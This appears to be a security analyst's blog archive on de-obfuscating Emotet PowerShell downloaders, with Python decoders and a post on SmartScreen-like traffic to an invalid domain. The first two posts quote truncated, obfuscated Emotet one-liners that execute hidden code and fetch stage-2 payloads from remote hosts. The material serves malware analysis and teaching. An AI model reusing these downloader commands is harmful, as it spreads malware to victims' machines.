Posts

Showing posts from 2018

July 2018, Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could simply run them through a sandbox, but I like to really understand the obfuscation for myself, which is why I take the time to reverse it a little and to share how I go about it. I will say that since I started using CyberChef, it almost feels like cheating. I had a Python script that I kept updating to look for signs of known Emotet encodings I had observed and then decode them; I was up to version 8 of that script. I still write this stuff to keep in practice, but I find CyberChef a much faster way of "writing" a decoder of sorts. So, the new variant I observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '[R]VDbagIxEP2VfQhEsZv0oVAwLA...
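
The one-liner above wraps a Base64 string in a DeflateStream, so the decode is Base64 followed by raw DEFLATE. The script below is an added example of how I would write that decoder in Python; it is not the post's own script or CyberChef recipe. Because the post's Base64 blob is truncated, the sample one-liner is constructed here by compressing a harmless PowerShell string; the domain example.invalid and the variable names are placeholders. The regex matches `FromBase64String('...')` case-insensitively, since the casing in these samples is randomised.

```python
import base64
import re
import zlib

# Constructed stand-in for the stage-2 script a real sample would carry.
# (example.invalid is a reserved, non-resolving domain.)
SAMPLE_STAGE2 = "$u = 'http://example.invalid/stage2'; Write-Host $u"

# Case-insensitive: the casing of FromBase64String is randomised in the samples.
B64_ARG = re.compile(r"frombase64string\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]",
                     re.IGNORECASE)


def build_sample_oneliner(stage2: str) -> str:
    """Build a one-liner shaped like the post's variant (constructed, not a
    real sample): raw DEFLATE (what .NET DeflateStream emits), then Base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # wbits=-15: raw DEFLATE, no zlib header
    blob = comp.compress(stage2.encode()) + comp.flush()
    b64 = base64.b64encode(blob).decode()
    return ("powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM("
            "[SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '"
            + b64 + "' ), [sYStem.iO.cOMpressiON.cOmpREsSIOnMOde]::dEcOmPRESs))")


def extract_base64(cmd: str) -> str:
    """Pull the Base64 argument out of the one-liner, dropping any whitespace."""
    m = B64_ARG.search(cmd)
    if not m:
        raise ValueError("no FromBase64String('...') argument found")
    return re.sub(r"\s+", "", m.group(1))


def inflate(blob: bytes) -> bytes:
    """Try raw DEFLATE first (DeflateStream), then zlib and gzip framing, so the
    same decoder copes with GZipStream-based variants."""
    errors = []
    for wbits in (-15, 15, 31):
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error as e:
            errors.append("wbits=%d: %s" % (wbits, e))
    raise ValueError("not DEFLATE/zlib/gzip data: " + "; ".join(errors))


def decode_oneliner(cmd: str) -> str:
    """Base64-decode, inflate and return the embedded script as text."""
    return inflate(base64.b64decode(extract_base64(cmd))).decode("utf-8", errors="replace")


def find_urls(script: str) -> list:
    """Stage-2 download links are what we are after once the script is readable."""
    return re.findall(r"https?://[^\s'\"]+", script)


if __name__ == "__main__":
    cmd = build_sample_oneliner(SAMPLE_STAGE2)
    print(cmd)
    script = decode_oneliner(cmd)
    print(script)
    print(find_urls(script))
```

If the raw inflate fails with a stored-block or header error, the fallback framings are tried before giving up; that is the usual sign that a sample switched from DeflateStream to GZipStream.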

June 2018, Emotet encoding observed and decoded

Nothing earth-shattering to report here; I just wanted to share the latest Emotet-encoded PowerShell command and one simple way to decode it to extract the Stage 2 download links. I know a lot of these obfuscated PowerShell commands can be decoded by simply using Write-Host, but I do like to try different ways to reverse the obfuscation, as I think it makes for a good analyst exercise. The PowerShell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...
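
The `$(sV 'ofs' '')` prefix sets $OFS, the separator PowerShell uses when a char array is cast to [string], to the empty string, so the characters produced from the number list are joined back into a script. The numbers themselves are separated by arbitrary non-digit characters. The decoder below is an added Python example, not the post's method: it splits on any run of non-digits, then brute-forces a single-byte XOR key by scoring each candidate for printable, letter-heavy output. The single-byte XOR transform and the scoring heuristic are my assumptions about the scheme; the key is recovered by the code rather than taken from the post. The encoded input is the truncated string as printed above, so only its visible prefix decodes.

```python
import re

# The encoded string exactly as quoted (truncated) in the post.
ENCODED = ("15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68")


def split_numbers(encoded: str) -> list:
    """The separators are arbitrary non-digit characters (x - I > O ! J t H V ...),
    so split on any run of non-digits instead of on a fixed set."""
    return [int(t) for t in re.split(r"[^0-9]+", encoded) if t]


def xor_decode(values, key: int) -> str:
    """Assumed transform: each number is one character XORed with a single-byte key."""
    return "".join(chr(v ^ key) for v in values)


def score(text: str) -> int:
    """Heuristic for 'looks like a PowerShell script': reward ASCII letters and
    spaces, heavily penalise anything outside printable ASCII."""
    s = 0
    for ch in text:
        if ch.isascii() and (ch.isalpha() or ch == " "):
            s += 1
        elif not (32 <= ord(ch) <= 126):
            s -= 100
    return s


def recover_key(values) -> int:
    """A single-byte keyspace is only 256 wide: try every key, keep the best score."""
    return max(range(256), key=lambda k: score(xor_decode(values, k)))


def decode(encoded: str):
    """Return (key, decoded script) for a number-list encoding of this shape."""
    values = split_numbers(encoded)
    key = recover_key(values)
    return key, xor_decode(values, key)


def stage2_urls(script: str) -> list:
    """Pull the download links out of the decoded script. The list is '@'-joined
    in the decoded text, so '@' is treated as a URL terminator."""
    return re.findall(r"https?://[^\s'\"@]+", script)


if __name__ == "__main__":
    key, script = decode(ENCODED)
    print("key: %d (0x%02x)" % (key, key))
    print(script)
    print(stage2_urls(script))
```

The scoring matters more than it looks: a plain "all printable" test is satisfied by more than one key for this sample, whereas counting letters and spaces singles out the right one, because only the correct key turns the recurring separator value into a space.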

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit unsuccessfully, as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header. For example:

252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b0061007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f006d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f006e007300

translates to

https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query, and unsuccessfully resolve, this domain. So I did some digging, and the results ranged wildly:

A patent for reputation-based software: patentimages.storage.googleapis.com/pdfs/US8695092.pdf

A suggestion that this is part of a Canon printer: https://translate.googl...
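
The hex above is a UTF-16LE string (each ASCII character followed by a 00 byte) sitting two bytes into the blob. The script below is an added example of recovering it, not something from the original post: it hex-decodes the header value and scans the bytes for runs of printable ASCII interleaved with NUL, the way `strings -el` does, so the text is found wherever it starts rather than assuming it begins at offset zero. The minimum run length of 8 is an assumption chosen to suppress short false positives.

```python
import re

# Hex value exactly as quoted in the post (from the HTTP request header).
HEADER_HEX = ("252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b00"
              "61007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f00"
              "6d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f"
              "006e007300")


def utf16le_strings(data: bytes, min_len: int = 8) -> list:
    """Return every run of at least min_len printable ASCII characters encoded
    as UTF-16LE (char, 0x00 pairs), at any byte offset in data."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(data)]


def decode_header(hex_text: str) -> list:
    """Hex-decode a header value and pull out the UTF-16LE strings in it."""
    data = bytes.fromhex(hex_text.strip())
    return utf16le_strings(data)


def leading_ascii(hex_text: str) -> str:
    """Whatever precedes the first UTF-16LE run, shown as ASCII for inspection."""
    data = bytes.fromhex(hex_text.strip())
    m = re.search(rb"(?:[\x20-\x7e]\x00){8,}", data)
    return data[: m.start() if m else len(data)].decode("ascii", errors="replace")


if __name__ == "__main__":
    print(leading_ascii(HEADER_HEX))   # the two bytes before the UTF-16 text
    for s in decode_header(HEADER_HEX):
        print(s)
```

The two bytes before the run (25 2F, "%/" in ASCII) are not part of the UTF-16 text and are skipped by the scan; if a header value carries several encoded strings, each one comes back as a separate list entry.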